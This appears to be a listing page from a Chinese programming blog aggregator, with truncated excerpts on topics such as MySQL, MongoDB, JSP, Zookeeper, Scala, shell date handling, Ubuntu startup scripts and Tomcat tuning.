    DELIMITER $$ DROP PROCEDURE IF EXISTS getUserInfo $$ CREATE PROCEDURE getUserInfo(in date_day datetime)-- -- 实例-- 存储过程名为:getUserInfo-- 参数为:date_day日期格式:2008-03-08--    BEGINdecla
  • mysql 和 sqlite 区别 Array_06 sqlite
    转载: http://www.cnblogs.com/ygm900/p/3460663.html mysql 和 sqlite 区别 SQLITE是单机数据库。功能简约,小型化,追求最大磁盘效率 MYSQL是完善的服务器数据库。功能全面,综合化,追求最大并发效率 MYSQL、Sybase、Oracle等这些都是试用于服务器数据量大功能多需要安装,例如网站访问量比较大的。而sq
  • pinyin4j使用 oloz pinyin4j
    首先需要pinyin4j的jar包支持;jar包已上传至附件内 方法一:把汉字转换为拼音;例如:编程转换后则为biancheng      /** * 将汉字转换为全拼 * @param src 你的需要转换的汉字 * @param isUPPERCASE 是否转换为大写的拼音; true:转换为大写;fal
  • 微博发送私信 随意而生 微博
    在前面文章中说了如和获取登陆时候所需要的cookie,现在只要拿到最后登陆所需要的cookie,然后抓包分析一下微博私信发送界面 http://weibo.com/message/history?uid=****&name=**** 可以发现其发送提交的Post请求和其中的数据, 让后用程序模拟发送POST请求中的数据,带着cookie发送到私信的接入口,就可以实现发私信的功能了。
  • jsp 香水浓 jsp
    JSP初始化     容器载入JSP文件后,它会在为请求提供任何服务前调用jspInit()方法。如果您需要执行自定义的JSP初始化任务,复写jspInit()方法就行了 JSP执行     这一阶段描述了JSP生命周期中一切与请求相关的交互行为,直到被销毁。     当JSP网页完成初始化后
  • 在 Windows 上安装 SVN Subversion 服务端 AdyZhang SVN
    在 Windows 上安装 SVN Subversion 服务端2009-09-16高宏伟哈尔滨市道里区通达街291号   最佳阅读效果请访问原地址:http://blog.donews.com/dukejoe/archive/2009/09/16/1560917.aspx   现在的Subversion已经足够稳定,而且已经进入了它的黄金时段。我们看到大量的项目都在使
  • android开发中如何使用 alertDialog从listView中删除数据? aijuans android
    我现在使用listView展示了很多的配置信息,我现在想在点击其中一条的时候填出 alertDialog,点击确认后就删除该条数据,( ArrayAdapter ,ArrayList,listView 全部删除),我知道在 下面的onItemLongClick 方法中 参数 arg2  是选中的序号,但是我不知道如何继续处理下去 1 2 3
  • jdk-6u26-linux-x64.bin 安装 baalwolf linux
    1.上传安装文件(jdk-6u26-linux-x64.bin) 2.修改权限 [root@localhost ~]# ls -l /usr/local/jdk-6u26-linux-x64.bin 3.执行安装文件 [root@localhost ~]# cd /usr/local [root@localhost local]# ./jdk-6u26-linux-x64.bin&nbs
  • MongoDB经典面试题集锦 BigBird2012 mongodb
    1.什么是NoSQL数据库?NoSQL和RDBMS有什么区别?在哪些情况下使用和不使用NoSQL数据库? NoSQL是非关系型数据库,NoSQL = Not Only SQL。 关系型数据库采用的结构化的数据,NoSQL采用的是键值对的方式存储数据。 在处理非结构化/半结构化的大数据时;在水平方向上进行扩展时;随时应对动态增加的数据项时可以优先考虑使用NoSQL数据库。 在考虑数据库的成熟
  • JavaScript异步编程Promise模式的6个特性 bijian1013 JavaScriptPromise
            Promise是一个非常有价值的构造器,能够帮助你避免使用镶套匿名方法,而使用更具有可读性的方式组装异步代码。这里我们将介绍6个最简单的特性。         在我们开始正式介绍之前,我们想看看Javascript Promise的样子: var p = new Promise(function(r
  • [Zookeeper学习笔记之八]Zookeeper源代码分析之Zookeeper.ZKWatchManager bit1129 zookeeper
    ClientWatchManager接口 //接口的唯一方法materialize用于确定那些Watcher需要被通知 //确定Watcher需要三方面的因素1.事件状态 2.事件类型 3.znode的path public interface ClientWatchManager { /** * Return a set of watchers that should
  • 【Scala十五】Scala核心九:隐式转换之二 bit1129 scala
    隐式转换存在的必要性,   在Java Swing中,按钮点击事件的处理,转换为Scala的的写法如下:   val button = new JButton button.addActionListener( new ActionListener { def actionPerformed(event: ActionEvent) {
  • Android JSON数据的解析与封装小Demo ronin47
    转自:http://www.open-open.com/lib/view/open1420529336406.html package com.example.jsondemo; import org.json.JSONArray; import org.json.JSONException; import org.json.JSONObject;    impor
  • [设计]字体创意设计方法谈 brotherlamp UIui自学ui视频ui教程ui资料
      从古至今,文字在我们的生活中是必不可少的事物,我们不能想象没有文字的世界将会是怎样。在平面设计中,UI设计师在文字上所花的心思和功夫最多,因为文字能直观地表达UI设计师所的意念。在文字上的创造设计,直接反映出平面作品的主题。 如设计一幅戴尔笔记本电脑的广告海报,假设海报上没有出现“戴尔”两个文字,即使放上所有戴尔笔记本电脑的图片都不能让人们得知这些电脑是什么品牌。只要写上“戴尔笔
  • 单调队列-用一个长度为k的窗在整数数列上移动,求窗里面所包含的数的最大值 bylijinnan java算法面试题
    import java.util.LinkedList; /* 单调队列 滑动窗口 单调队列是这样的一个队列:队列里面的元素是有序的,是递增或者递减 题目:给定一个长度为N的整数数列a(i),i=0,1,...,N-1和窗长度k. 要求:f(i) = max{a(i-k+1),a(i-k+2),..., a(i)},i = 0,1,...,N-1 问题的另一种描述就
  • struts2处理一个form多个submit chiangfai struts2
    web应用中,为完成不同工作,一个jsp的form标签可能有多个submit。如下代码: <s:form action="submit" method="post" namespace="/my"> <s:textfield name="msg" label="叙述:">
  • shell查找上个月,陷阱及野路子 chenchao051 shell
    date -d "-1 month" +%F     以上这段代码,假如在2012/10/31执行,结果并不会出现你预计的9月份,而是会出现八月份,原因是10月份有31天,9月份30天,所以-1 month在10月份看来要减去31天,所以直接到了8月31日这天,这不靠谱。     野路子解决:假设当天日期大于15号
  • mysql导出数据中文乱码问题 daizj mysql中文乱码导数据
    解决mysql导入导出数据乱码问题方法: 1、进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+----------------------------------------+ | Variable_name&nbs
  • SAE部署Smarty出现:Uncaught exception 'SmartyException' with message 'unable to write dcj3sjt126com PHPsmartysae
      对于SAE出现的问题:Uncaught exception 'SmartyException' with message 'unable to write file...。 官方给出了详细的FAQ:http://sae.sina.com.cn/?m=faqs&catId=11#show_213 解决方案为:   01 $path 
  • 《教父》系列台词 dcj3sjt126com
    Your love is also your weak point. 你的所爱同时也是你的弱点。   If anything in this life is certain, if history has taught us anything, it is that you can kill anyone.   不顾家的人永远不可能成为一个真正的男人。 &
  • mongodb安装与使用 dyy_gusi mongo
    一.MongoDB安装和启动,widndows和linux基本相同 1.下载数据库,     linux:mongodb-linux-x86_64-ubuntu1404-3.0.3.tgz 2.解压文件,并且放置到合适的位置     tar -vxf mongodb-linux-x86_64-ubun
  • Git排除目录 geeksun git
    在Git的版本控制中,可能有些文件是不需要加入控制的,那我们在提交代码时就需要忽略这些文件,下面讲讲应该怎么给Git配置一些忽略规则。   有三种方法可以忽略掉这些文件,这三种方法都能达到目的,只不过适用情景不一样。 1.  针对单一工程排除文件 这种方式会让这个工程的所有修改者在克隆代码的同时,也能克隆到过滤规则,而不用自己再写一份,这就能保证所有修改者应用的都是同一
  • Ubuntu 创建开机自启动脚本的方法 hongtoushizi ubuntu
    转载自: http://rongjih.blog.163.com/blog/static/33574461201111504843245/ Ubuntu 创建开机自启动脚本的步骤如下: 1) 将你的启动脚本复制到 /etc/init.d目录下 以下假设你的脚本文件名为 test。   2) 设置脚本文件的权限 $ sudo chmod 755
  • 第八章 流量复制/AB测试/协程 jinnianshilongnian nginxluacoroutine
    流量复制 在实际开发中经常涉及到项目的升级,而该升级不能简单的上线就完事了,需要验证该升级是否兼容老的上线,因此可能需要并行运行两个项目一段时间进行数据比对和校验,待没问题后再进行上线。这其实就需要进行流量复制,把流量复制到其他服务器上,一种方式是使用如tcpcopy引流;另外我们还可以使用nginx的HttpLuaModule模块中的ngx.location.capture_multi进行并发
  • 电商系统商品表设计 lkl
    DROP TABLE IF EXISTS `category`; -- 类目表 /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `category` ( `id` int(11) NOT NUL
  • 修改phpMyAdmin导入SQL文件的大小限制 pda158 sqlmysql
     用phpMyAdmin导入mysql数据库时,我的10M的 数据库不能导入,提示mysql数据库最大只能导入2M。    phpMyAdmin数据库导入出错:   You probably tried to upload too large file. Please refer to documentation for ways to workaround this limit.
  • Tomcat性能调优方案 Sobfist apachejvmtomcat应用服务器
    一、操作系统调优 对于操作系统优化来说,是尽可能的增大可使用的内存容量、提高CPU的频率,保证文件系统的读写速率等。经过压力测试验证,在并发连接很多的情况下,CPU的处理能力越强,系统运行速度越快。。 【适用场景】 任何项目。 二、Java虚拟机调优 应该选择SUN的JVM,在满足项目需要的前提下,尽量选用版本较高的JVM,一般来说高版本产品在速度和效率上比低版本会有改进。 J
  • SQLServer学习笔记 vipbooks 数据结构xml
    1、create database school 创建数据库school 2、drop database school 删除数据库school 3、use school 连接到school数据库,使其成为当前数据库 4、create table class(classID int primary key identity not null) 创建一个名为class的表,其有一
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他